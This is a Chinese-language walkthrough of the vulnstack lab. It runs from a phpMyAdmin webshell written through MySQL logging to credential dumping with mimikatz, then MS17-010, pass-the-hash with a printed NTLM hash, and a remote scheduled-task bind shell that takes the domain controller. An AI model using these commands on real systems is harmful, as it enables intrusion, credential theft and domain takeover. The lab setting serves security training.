靶機下載地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

攻擊拓撲如下

0X02信息收集

用nmap找到外網IP地址

netdiscover -i eth0 -r 192.168.72.0/24

御劍掃目錄掃到後臺

掃到目錄http://192.168.72.130/phpmyadmin/

弱口令root /root進入後臺

0x03phpmyadmin後臺getshell

show variables like '%general%'; #查看日誌狀態

SET GLOBAL general_log='on'

SET GLOBAL general_log_file='C:/phpStudy/www/233.php' 設置路徑

SELECT '' //寫入一句話木馬

getshell

http://192.168.72.130/233.php

0x04權限提升

直接用Cs的腳本ms14-068提權

0x05內網信息收集

把webshell轉換成cs上線

ipconfig /all

hashdump看一下密碼

再用mimikatz抓一下明文密碼，抓到hongrisec@2020

shell net user /domain

查看域內用戶

使用lodan掃描內網網絡

使用lazagone.exe 抓取本機所有密碼

抓到了很多win7機器上的密碼

用Msf的這個模塊可以判斷目標機器上面裝了那些軟件

run post/windows/gather/enum_applications 使用這個之後發現win7(雙網卡機器)上有一個現成的nmap

直接用beacon下的nmap去掃描DC的漏洞 shell nmap --script=vuln 192.168.52.138 發現域控存在ms17-010

這裏其實已經可以直接去用Msf打域控的17010了

0x06MSF與CS聯動

新啓一個監聽，用foriereverse_tcp,然後msf開始監聽端口，成功轉接cs的shell

查看當前網段並添加路由

0x07配置msf代理

之前掃描的是DC，先看一下2003有沒有漏洞，掃一下141，其實不掛代理也行，win7裏面有一個Nmap，這裏要注意socks代理不支持icmp協議

proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms17-010.nse 192.168.52.141

0x08兩種拿下2003

因爲已經知道了漏洞，直接永恆之藍打過去了

PTH方法

選擇之前生成的那個smb beacon 然後在用哈希傳遞的方法，域內管理員的賬號直接登錄

192.168.52.141成功上線

0x09票據+計劃任務拿DC

mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141

shell dir \192.168.52.138\c$ //dir DC的目錄

生成一個exe馬

這裏用windows/reverse_bind_tcp LHOST=0.0.0.0 LPORT=7777 生成正向的馬 yukong.exe

把馬複製到域控機器上shell copy C:\yukong.exe \192.168.52.138\c$

然後再用這個寫入計劃任務的方法去連接，這裏馬反彈會連不成功，所以

shell schtasks /create /tn "test" /tr C:\yukong.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2020"

掛着win7代理 proxy nc -vv 192.168.52.138 7777 即可彈回DC138的shell

用Meterpreter的馬也可以，之前失敗了，後續還是改成meterpreter的馬，或者把普通shell再升級成meterpreter再導入cs也可以

馬上線之後清除計劃任務schtasks /delete /s 192.168.52.138 /tn "test" /f

相關文章